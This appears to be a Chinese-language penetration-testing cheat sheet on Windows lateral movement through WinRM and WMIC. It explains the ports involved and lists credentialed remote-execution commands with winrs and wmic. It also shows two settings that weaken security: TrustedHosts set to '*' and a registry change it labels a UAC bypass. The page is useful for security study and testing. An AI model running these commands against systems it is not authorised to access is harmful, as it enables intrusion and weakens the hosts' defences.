Lateral Movement

WinRM ¶

Windows 远程管理 (WinRM) 是 WS-Management 协议的 Microsoft 实现，该协议是标准简单对象访问协议 (基于 SOAP) 的防火墙友好协议，允许不同供应商的硬件和操作系统之间进行互操作。

WS-Management协议规范为系统提供了一种跨 IT 基础结构访问和交换管理信息的常用方法。 WinRM 和智能平台管理接口 (IPMI) 标准，以及事件收集器服务是称为硬件管理的功能集的组件。

利用条件 ¶

WinRM默认使用TCP协议，并依赖于以下两个端口：

HTTP（默认端口5985）：WinRM可以通过HTTP协议进行通信。当使用HTTP时，通信数据不加密，可能存在安全风险。
HTTPS（默认端口5986）：WinRM还可以通过HTTPS协议进行加密通信。使用HTTPS可以提供更高的安全性，确保通信数据的机密性和完整性。

Quickconfig ¶

winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}
netstat -ano | find "5985"

远程命令执行 ¶

winrs -r:http://ip:5985 -u:username -p:password "whoami /all"
winrs -r:http://ip:5985 -u:username -p:password cmd

Bypass UAC ¶

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

winrs -r:http://ip:5985 -u:username -p:password "whoami /groups"

WMI 命令行 (WMIC) 实用工具为 Windows Management Instrumentation (WMI) 提供命令行接口。 WMIC 与现有的 shell 和实用工具命令兼容。以下信息是 WMIC 的一般参考指南。有关如何使用 WMIC 的详细信息和指南，包括有关别名、谓词、开关和命令的其他信息，请参阅使用 Windows Management Instrumentation 命令行和 WMIC - 对 WMI 进行命令行控制。

利用条件 ¶

远程服务器启动Windows Management Instrumentation服务（默认开启）
135 端口未被过滤，默认配置下目标主机防火墙开启将无法连接

执行命令 ¶

# 执行命令无回显
wmic /node:ip /user:username /password:password process call create "cmd.exe /c ipconfig > c:/1.txt"